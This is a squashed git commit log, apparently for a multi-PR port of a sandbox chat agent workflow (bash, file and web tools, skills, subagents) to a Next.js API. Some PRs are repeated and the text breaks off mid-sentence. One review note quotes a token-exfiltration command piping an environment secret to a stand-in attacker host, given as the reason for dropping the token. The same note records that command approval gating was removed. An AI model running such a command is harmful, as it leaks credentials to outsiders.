`ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: <path>` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - \${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against \`recoupable/org-rostrum-pacific-...\` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked \`skill({ skill: "recoup-api" })\` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589) * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) Completes the open-agents tool surface. The agent now has all 11 tools. **ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool- call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed. **task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub- `streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent. The subagent tool set deliberately EXCLUDES: - task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree) - ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills) AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default. buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog). Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature. Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(task-tool): provide non-empty subagent prompt The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS) Address PR review feedback: - SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file). - KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`. - taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592) * feat(chat-workflow): emit per-message cost/usage metadata (Bundle C) First step in the open-agents → api cutover sequence. Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow. New (SRP, one function per file): - lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata. - lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records. - lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata. - lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts. Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4). Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim: - Extract addTokenCounts.ts (used by addLanguageModelUsage) - Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost) - Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata) Upgrade the AI SDK so the wire format matches open-agents natively: - ai: 6.0.0-beta.122 → ^6.0.190 - @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so: - Delete normalizeUsage.ts + test (net -82 LOC) - Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly) Production code changes for the SDK upgrade: - runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise<ModelMessage[]>) Tests: 3106/3106 pass; production typecheck clean; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via 